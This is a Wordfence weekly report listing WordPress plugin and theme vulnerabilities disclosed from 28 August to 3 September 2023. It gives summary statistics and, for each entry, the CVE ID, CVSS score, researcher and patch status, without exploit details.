Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.


 

Total Unpatched & Patched Vulnerabilities Last Week

Patch Status Number of Vulnerabilities
Unpatched 37
Patched 27

Total Vulnerabilities by CVSS Severity Last Week

Severity Rating Number of Vulnerabilities
Low Severity 2
Medium Severity 53
High Severity 6
Critical Severity 3

Total Vulnerabilities by CWE Type Last Week

Vulnerability Type by CWE Number of Vulnerabilities
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) 29
Missing Authorization 12
Cross-Site Request Forgery (CSRF) 11
Unrestricted Upload of File with Dangerous Type 5
Server-Side Request Forgery (SSRF) 1
URL Redirection to Untrusted Site (‘Open Redirect’) 1
Improper Input Validation 1
Authorization Bypass Through User-Controlled Key 1
Improper Control of Generation of Code (‘Code Injection’) 1
Use of Less Trusted Source 1
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) 1

Researchers That Contributed to WordPress Security Last Week

Researcher Name Number of Vulnerabilities
Rio Darmawan 11
Rafie Muhammad 5
Lana Codes
(Wordfence Vulnerability Researcher)
4
thiennv 3
LEE SE HYOUNG 3
Mika 2
Zlrqh 2
Dmitrii 2
László Radnai 2
Elliot 2
Marco Wotschka
(Wordfence Vulnerability Researcher)
2
Bartłomiej Marek 2
Tomasz Swiadek 2
Abdi Pranata 2
Phd 1
Emili Castells 1
Pavitra Tiwari 1
Ramuel Gall
(Wordfence Vulnerability Researcher)
1
FearZzZz 1
emad 1
Prasanna V Balaji 1
deokhunKim 1
yuyudhn 1
Le Ngoc Anh 1
Dipak Panchal 1
mehmet 1
Lokesh Dachepalli 1
Jonas Höbenreich 1
Enrico Marcolini 1
Animesh Gaurav 1
Jonatas Souza Villa Flor 1
Ravi Dharmawan 1

 

Are you a security researcher who would like to be featured in our weekly vulnerability report? You can responsibly disclose your WordPress vulnerability discoveries to us and obtain a CVE ID through this form. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the Wordfence Intelligence leaderboard along with being mentioned in our weekly vulnerability report.


WordPress Plugins with Reported Vulnerabilities Last Week

Software Name Software Slug
Activity Log aryo-activity-log
AffiliateWP AffiliateWP
All-in-One WP Migration Box Extension all-in-one-wp-migration-box-extension
All-in-One WP Migration Dropbox Extension all-in-one-wp-migration-dropbox-extension
All-in-One WP Migration Google Drive Extension all-in-one-wp-migration-gdrive-extension
All-in-One WP Migration OneDrive Extension all-in-one-wp-migration-onedrive-extension
Better Elementor Addons better-elementor-addons
Bridge Core bridge-core
Ditty – Responsive News Tickers, Sliders, and Lists ditty-news-ticker
DoLogin Security dologin
Easy Coming Soon easy-coming-soon
Easy Newsletter Signups easy-newsletter-signups
Email Encoder – Protect Email Addresses and Phone Numbers email-encoder-bundle
Fast & Effective Popups & Lead-Generation for WordPress – HollerBox holler-box
FileOrganizer – Manage WordPress and Website Files fileorganizer
Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager folders
Font Awesome 4 Menus font-awesome-4-menus
Forminator – Contact Form, Payment Form & Custom Form Builder forminator
GiveWP – Donation Plugin and Fundraising Platform give
GuruWalk Affiliates guruwalk-affiliates
Happy Addons for Elementor Pro happy-elementor-addons-pro
Import XML and RSS Feeds import-xml-feed
Localize Remote Images localize-remote-images
Login and Logout Redirect login-and-logout-redirect
LuckyWP Scripts Control luckywp-scripts-control
Maintenance Switch maintenance-switch
MakeStories (for Google Web Stories) makestories-helper
Metform Elementor Contact Form Builder metform
Multi-column Tag Map multi-column-tag-map
Olive One Click Demo Import olive-one-click-demo-import
Order Tracking – WordPress Status Tracking Plugin order-tracking
Ovic Product Bundle ovic-product-bundle
Popup Builder – Create highly converting, mobile friendly marketing popups. popup-builder
Popup box ays-popup-box
PowerPress Podcasting plugin by Blubrry powerpress
Prevent files / folders access prevent-file-access
Pricing Deals for WooCommerce pricing-deals-for-woocommerce
RSVPMaker rsvpmaker
Remove/hide Author, Date, Category Like Entry-Meta removehide-author-date-category-like-entry-meta
Responsive Gallery Grid responsive-gallery-grid
Sermon’e – Sermons Online sermone-online-sermons-management
Simple 301 Redirects by BetterLinks simple-301-redirects
Site Reviews site-reviews
Sitekit sitekit
Slimstat Analytics wp-slimstat
Smarty for WordPress smarty-for-wordpress
Snap Pixel snap-pixel
Social Media Share Buttons & Social Sharing Icons ultimate-social-media-icons
Social Share Boost social-share-boost
Surfer – WordPress Plugin surferseo
URL Shortener by MyThemeShop mts-url-shortener
Ultimate Addons for Contact Form 7 ultimate-addons-for-contact-form-7
WP Bannerize Pro wp-bannerize-pro
WP GoToWebinar wp-gotowebinar
WP Search Analytics search-analytics
WP Super Minify wp-super-minify
WP Synchro – WordPress Migration Plugin for Database & Files wpsynchro
WP Users Media wp-users-media
WP-dTree wp-dtree-30
WordPress Ecommerce For Creating Fast Online Stores – By SureCart surecart
authLdap authldap

WordPress Themes with Reported Vulnerabilities Last Week

Software Name Software Slug
Arya Multipurpose Pro arya-multipurpose-pro
Everest News Pro everest-news-pro

Vulnerability Details

Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities.

Forminator <= 1.24.6 – Unauthenticated Arbitrary File Upload

Affected Software: Forminator – Contact Form, Payment Form & Custom Form Builder
CVE ID: CVE-2023-4596
CVSS Score: 9.8 (Critical)
Researcher/s: mehmet
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513

Import XML and RSS Feeds <= 2.1.4 – Unauthenticated Remote Code Execution

Affected Software: Import XML and RSS Feeds
CVE ID: CVE-2023-4521
CVSS Score: 9.8 (Critical)
Researcher/s: Enrico Marcolini
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c0856920-5463-4dd3-a4fd-e56901a89b83

RSVPMarker <= 10.6.6 – Unauthenticated SQL Injection

Affected Software: RSVPMaker
CVE ID: CVE-2023-41652
CVSS Score: 9.8 (Critical)
Researcher/s: Ravi Dharmawan
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f655704d-70a1-40d8-ae36-39029185d262

Folders <= 2.9.2 – Authenticated (Author+) Arbitrary File Upload in handle_folders_file_upload


Give – Donation Plugin <= 2.33.0 – Authenticated(Give Manager+) Privilege Escalation

Affected Software: GiveWP – Donation Plugin and Fundraising Platform
CVE ID: CVE-2023-41665
CVSS Score: 7.2 (High)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/22ff4b09-063b-425e-9d59-be2e5d283186

Olive One Click Demo Import <= 1.0.9 – Authenticated (Administrator+) Arbitrary File Upload in olive_one_click_demo_import_save_file

Affected Software: Olive One Click Demo Import
CVE ID: CVE-2023-29102
CVSS Score: 7.2 (High)
Researcher/s: deokhunKim
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4f3e3311-11d8-4e4f-9d99-36533fe44d56

DoLogin Security <= 3.6 – Unauthenticated Stored Cross-Site Scripting

Affected Software: DoLogin Security
CVE ID: CVE-2023-4549
CVSS Score: 7.2 (High)
Researcher/s: Bartłomiej Marek, Tomasz Swiadek
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ad34d657-da59-46ff-a54a-64e6c8974b69

Prevent files / folders access <= 2.5.1 – Authenticated (Administrator+) Arbitrary File Upload in mo_media_restrict_page

Affected Software: Prevent files / folders access
CVE ID: CVE-2023-4238
CVSS Score: 7.2 (High)
Researcher/s: Dmitrii
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b266bd10-dbc6-4058-a5b2-1578c0814cb4

Import XML and RSS Feeds <= 2.1.3 – Authenticated (Admin+) Arbitrary File Upload

Affected Software: Import XML and RSS Feeds
CVE ID: CVE-2023-4300
CVSS Score: 7.2 (High)
Researcher/s: Jonatas Souza Villa Flor
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f45b4c43-c6c4-41da-bd59-9a355800815a

Easy Newsletter Signups <= 1.0.4 – Missing Authorization

Affected Software: Easy Newsletter Signups
CVE ID: CVE-2023-41664
CVSS Score: 6.5 (Medium)
Researcher/s: Emili Castells
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/288946ae-6e58-42e6-89d1-8951539728d3

Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Slimstat Analytics
CVE ID: CVE-2023-4597
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/52aee4b8-f494-4eeb-8357-71ce8d5bc656

Sitekit <= 1.3 – Authenticated (Contributor+) Stored Cross-Site Scripting via ‘sitekit_iframe ‘ shortcode

Affected Software: Sitekit
CVE ID: CVE-2023-27628
CVSS Score: 6.4 (Medium)
Researcher/s: Mika
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7f0be29a-7896-4166-a2a6-64f99d845236

Font Awesome 4 Menus <= 4.7.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Font Awesome 4 Menus
CVE ID: CVE-2023-4718
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/dc59510c-6eaf-4526-8acb-c07e39923ad9

Email Encoder <= 2.1.7 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Email Encoder – Protect Email Addresses and Phone Numbers
CVE ID: CVE-2023-4599
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e90f04e4-eb4c-4822-89c6-79f553987c37

Login and Logout Redirect <= 2.0.2 – Open Redirect

Affected Software: Login and Logout Redirect
CVE ID: CVE-2023-41648
CVSS Score: 6.1 (Medium)
Researcher/s: Phd
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/09a0639e-4b14-4dc9-a50c-d18234faa7b1

Arya Multipurpose Pro <= 1.0.8 – Reflected Cross-Site Scripting

Affected Software: Arya Multipurpose Pro
CVE ID: CVE-2023-41237
CVSS Score: 6.1 (Medium)
Researcher/s: László Radnai
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/22cfbaa1-5412-4944-899c-7ae41d017384

Social Media & Share Icons <= 2.8.3 – Reflected Cross-Site Scripting

Affected Software: Social Media Share Buttons & Social Sharing Icons
CVE ID: CVE-2023-41238
CVSS Score: 6.1 (Medium)
Researcher/s: FearZzZz
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3a8998db-ffc2-40b2-a191-09380984adac

URL Shortener by MyThemeShop <= 1.0.17 – Reflected Cross-Site Scripting via ‘page’

Affected Software: URL Shortener by MyThemeShop
CVE ID: CVE-2023-30472
CVSS Score: 6.1 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/52c2837e-8947-4ce9-bda5-e0c2f831fb36

Sermon’e – Sermons Online <= 1.0.0 – Reflected Cross-Site Scripting

Affected Software: Sermon’e – Sermons Online
CVE ID: CVE-2023-41653
CVSS Score: 6.1 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5c17678e-6598-4e80-b121-beae822b9f81

WP-dTree <= 4.4.5 – Reflected Cross-Site Scripting

Affected Software: WP-dTree
CVE ID: CVE-2023-41662
CVSS Score: 6.1 (Medium)
Researcher/s: Le Ngoc Anh
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6c01da54-fbbe-42f9-a76e-8e823027d62a

Everest News Pro <= 1.1.7 – Reflected Cross-Site Scripting

Affected Software: Everest News Pro
CVE ID: CVE-2023-41235
CVSS Score: 6.1 (Medium)
Researcher/s: László Radnai
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bb967453-59d6-4b03-8c75-1906b99bff80

Bridge Core <= 3.0.9 – Reflected Cross-Site Scripting

Affected Software: Bridge Core
CVE ID: CVE-2023-40333
CVSS Score: 6.1 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bc698c40-4a2b-4dab-93f0-647e4db79d2c

Ditty <= 3.1.24 – Reflected Cross-Site Scripting

Affected Software: Ditty – Responsive News Tickers, Sliders, and Lists
CVE ID: CVE-2023-4148
CVSS Score: 6.1 (Medium)
Researcher/s: Animesh Gaurav
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cabf7aae-0673-4358-a2df-0ca22c8432b5

Happy Elementor Addons Pro <= 2.8.0 – Reflected Cross-Site Scripting

Affected Software: Happy Addons for Elementor Pro
CVE ID: CVE-2023-41236
CVSS Score: 6.1 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d536d3a8-9ac5-4ea9-8c65-16ad8b3a7106

Ultimate Addons for Contact Form 7 <= 3.1.32 – Reflected Cross-Site Scripting via ‘page’

Affected Software: Ultimate Addons for Contact Form 7
CVE ID: CVE-2023-30493
CVSS Score: 6.1 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d857324c-94c9-471a-9da8-0b8c9bb50262

Order Tracking Pro <= 3.3.6 – Reflected Cross-Site Scripting

Affected Software: Order Tracking – WordPress Status Tracking Plugin
CVE ID: CVE-2023-4471
CVSS Score: 6.1 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ed64d0ff-4f49-4c18-86ec-2c6fbd559d2e

WP Bannerize Pro <= 1.6.9 – Reflected Cross-Site Scripting

Affected Software: WP Bannerize Pro
CVE ID: CVE-2023-41663
CVSS Score: 6.1 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/edc35f8c-f916-433e-9d3f-4992e8c9d7cd

WP Search Analytics <= 1.4.7 – Reflected Cross-Site Scripting via ‘render_stats_page’

Affected Software: WP Search Analytics
CVE ID: CVE-2023-30471
CVSS Score: 6.1 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f6433a17-0017-46a9-a8e6-4d4a4a55f2db

PowerPress <= 11.0.6 – Authenticated (Contributor+) Server-Side Request Forgery via wp_ajax_powerpress_media_info

Affected Software: PowerPress Podcasting plugin by Blubrry
CVE ID: CVE-2023-41239
CVSS Score: 5.4 (Medium)
Researcher/s: Mika
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/031c31b2-6e27-47bb-9f63-2bbaa1edbbb2

Site Reviews <= 6.10.2 – Missing Authorization

Affected Software: Site Reviews
CVE ID: CVE Unknown
CVSS Score: 5.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/1accc41e-41d2-49e3-a80a-6b95b02cb42e

Responsive Gallery Grid <= 2.3.10 – Cross-Site Request Forgery

Affected Software: Responsive Gallery Grid
CVE ID: CVE-2023-41659
CVSS Score: 5.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3abe2de8-9127-4ef0-9194-cf331b20868a

LuckyWP Scripts Control <= 1.2.1 – Missing Authorization via multiple AJAX actions

Affected Software: LuckyWP Scripts Control
CVE ID: CVE-2023-29239
CVSS Score: 5.4 (Medium)
Researcher/s: Elliot
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3ed93c5c-38bb-4e84-8fe8-03dd75b4d9f3

Maintenance Switch <= 1.5.2 – Cross-Site Request Forgery via ‘admin_action_request’

Affected Software: Maintenance Switch
CVE ID: CVE-2023-29235
CVSS Score: 5.4 (Medium)
Researcher/s: Elliot
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6f14f19d-95b3-474b-a2ea-d846c85644cd

Simple 301 Redirects <= 2.0.7 – Cross-Site Request Forgery via ‘clicked’

Affected Software: Simple 301 Redirects by BetterLinks
CVE ID: CVE Unknown
CVSS Score: 5.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9945c85b-a97a-4ad0-9d0a-69faf157563a

Surfer <= 1.1.2.298 – Missing Authorization

Affected Software: Surfer – WordPress Plugin
CVE ID: CVE-2023-35037
CVSS Score: 5.4 (Medium)
Researcher/s: Jonas Höbenreich
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c06f9f6d-3cd0-4700-834b-435a99983453

Pricing Deals for WooCommerce <= 2.0.3.2 – Missing Authorization via vtprd_ajax_clone_rule

Affected Software: Pricing Deals for WooCommerce
CVE ID: CVE-2023-41240
CVSS Score: 5.3 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/1101bfe6-2075-4f44-933b-6d9f372100a2

Ovic Product Bundle <= 1.1.2 – Missing Authorization

Affected Software: Ovic Product Bundle
CVE ID: CVE-2023-41649
CVSS Score: 5.3 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5657ffe2-7d04-4834-bcec-ab6afaeda7df

Multiple ServMask Plugins <= (Various Versions) – Missing Authorization to Access Token Update


Localize Remote Images <= 1.0.9 – Cross-Site Request Forgery via admin menu

Affected Software: Localize Remote Images
CVE ID: CVE-2023-41244
CVSS Score: 5.3 (Medium)
Researcher/s: Lokesh Dachepalli
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ab96123e-17aa-461f-b460-e8eba82c78e1

Multi-column Tag Map <= 17.0.26 – Missing Authorization

Affected Software: Multi-column Tag Map
CVE ID: CVE-2023-41651
CVSS Score: 5.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d2a60cb2-fe7d-4c51-9995-5cb4682d9d26

Activity Log <= 2.8.7 – IP Address Spoofing

Affected Software: Activity Log
CVE ID: CVE-2023-4281
CVSS Score: 5.3 (Medium)
Researcher/s: Bartłomiej Marek, Tomasz Swiadek
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/de821236-f878-46a4-9265-bcf6e8661910

Order Tracking Pro <= 3.3.6 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Order Tracking – WordPress Status Tracking Plugin
CVE ID: CVE-2023-4500
CVSS Score: 4.7 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/81f9a4c6-971f-4f6d-8bb1-e97bf75cf8d3

GuruWalk Affiliates <= 1.0.0 – Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings

Affected Software: GuruWalk Affiliates
CVE ID: CVE-2023-27622
CVSS Score: 4.4 (Medium)
Researcher/s: Pavitra Tiwari
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/2b2714f7-9877-4d3d-a692-70fbf8584728

SureCart <= 2.5.0 – Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings

Affected Software: WordPress Ecommerce For Creating Fast Online Stores – By SureCart
CVE ID: CVE-2023-41241
CVSS Score: 4.4 (Medium)
Researcher/s: emad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/416c13ff-15ae-4ba4-8a95-7c07bec75c22

Smarty for WordPress <= 3.1.35 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Smarty for WordPress
CVE ID: CVE-2023-41661
CVSS Score: 4.4 (Medium)
Researcher/s: Prasanna V Balaji
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/498a10a1-8da6-4309-833f-950f6442d5ae

WP GoToWebinar <= 14.45 – Authenticated (Administrator+) Cross-Site Scripting

Affected Software: WP GoToWebinar
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4a7b32f5-5d27-4f5a-89f3-abf4f8da79e4

HollerBox <= 2.3.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Fast & Effective Popups & Lead-Generation for WordPress – HollerBox
CVE ID: CVE-2023-41657
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5c76871e-b774-4284-ad00-f8ef7f6df389

Popup Builder <= 4.1.15 – Authenticated (Admin+) Stored Cross-Site Scripting

Affected Software: Popup Builder – Create highly converting, mobile friendly marketing popups.
CVE ID: CVE-2023-3226
CVSS Score: 4.4 (Medium)
Researcher/s: Dipak Panchal
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7f97af51-1532-4034-8b2a-8356b65cb617

Snap Pixel <= 1.5.7 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Snap Pixel
CVE ID: CVE-2023-41242
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c37686f8-6bd7-4c06-b80a-7d6849bbc7b0

Easy Coming Soon <= 2.3 – Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings

Affected Software: Easy Coming Soon
CVE ID: CVE-2023-25483
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e46139c8-dd7e-4904-81b2-283952cea9b5

Popup Box <= 3.7.1 – Authenticated(Administrator+) Stored Cross-Site Scripting

Affected Software: Popup box
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e6dbbb52-4202-4d69-837f-c7d5ca06fab5

WP Users Media <= 4.2.3 – Cross-Site Request Forgery in wpusme_save_settings

Affected Software: WP Users Media
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Zlrqh
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/07a82335-d738-4c14-b385-04843f12e4ef

Metform Elementor Contact Form Builder <= 3.3.1 – Authenticated (Subscriber+) Information Disclosure via ‘mf_first_name’ shortcode

Affected Software: Metform Elementor Contact Form Builder
CVE ID: CVE-2023-0689
CVSS Score: 4.3 (Medium)
Researcher/s: Ramuel Gall
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/356cf06e-16e7-438b-83b5-c8a52a21f903

Social Share Boost <= 4.5 – Cross-Site Request Forgery via ‘syntatical_settings_content’

Affected Software: Social Share Boost
CVE ID: CVE-2023-25033
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/53a265b8-e34c-4683-a653-4b4b2410e9de

Better Elementor Addons <= 1.3.5 – Missing Authorization

Affected Software: Better Elementor Addons
CVE ID: CVE-2023-41656
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5a628eef-937c-4391-afac-22128ec5b51c

WP Users Media <= 4.2.3 – Missing Authorization via wpusme_save_settings

Affected Software: WP Users Media
CVE ID: CVE-2023-27428
CVSS Score: 4.3 (Medium)
Researcher/s: Zlrqh
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8e125188-4aff-4c64-b4ec-a363db2431b7

WP Super Minify <= 1.5.1 – Cross-Site Request Forgery via ‘wpsmy_admin_options’

Affected Software: WP Super Minify
CVE ID: CVE-2023-27615
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/af59fcf6-4435-45f0-8904-ff520ea86157

Remove/hide Author, Date, Category Like Entry-Meta <= 2.1 – Cross-Site Request Forgery

Affected Software: Remove/hide Author, Date, Category Like Entry-Meta
CVE ID: CVE-2023-41650
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cd0abdf2-24da-4e87-825b-0796af6c3ccd

MakeStories (for Google Web Stories) <= 2.8.0 – Cross-Site Request Forgery via ‘ms_set_options’

Affected Software: MakeStories (for Google Web Stories)
CVE ID: CVE-2023-27448
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d9f7130d-883a-4db4-9edf-f5526724de11

AffiliateWP <= 2.14.0 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Activation

Affected Software: AffiliateWP
CVE ID: CVE-2023-4600
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/eab422b8-8cf5-441e-a21f-6a0e1b7642b2

authLdap <= 2.5.8 – Cross-Site Request Forgery

Affected Software: authLdap
CVE ID: CVE-2023-41654
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/eddce6e0-2ea7-4980-97a7-857b2e1e3b69

WP Migration Plugin DB & Files – WP Synchro <= 1.9.1 – Cross-Site Request Forgery

Affected Software: WP Synchro – WordPress Migration Plugin for Database & Files
CVE ID: CVE-2023-41660
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f1b6f041-5ea6-48ca-9ca7-4ce96cbfa275

authLdap <= 2.5.8 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: authLdap
CVE ID: CVE-2023-41655
CVSS Score: 3.3 (Low)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5b91ad8b-79ec-4ef7-bb39-edb06309da5e

FileOrganizer <= 1.0.2 – Authenticated (Admin+) Arbitrary File Access

Affected Software: FileOrganizer – Manage WordPress and Website Files
CVE ID: CVE-2023-3664
CVSS Score: 2.7 (Low)
Researcher/s: Dmitrii
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/11c9124d-80e0-435d-9eb4-901c4f481a6f

As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.

This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us using our CVE Request form, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

The post Wordfence Intelligence Weekly WordPress Vulnerability Report (August 28, 2023 to September 3, 2023) appeared first on Wordfence.

Pin It on Pinterest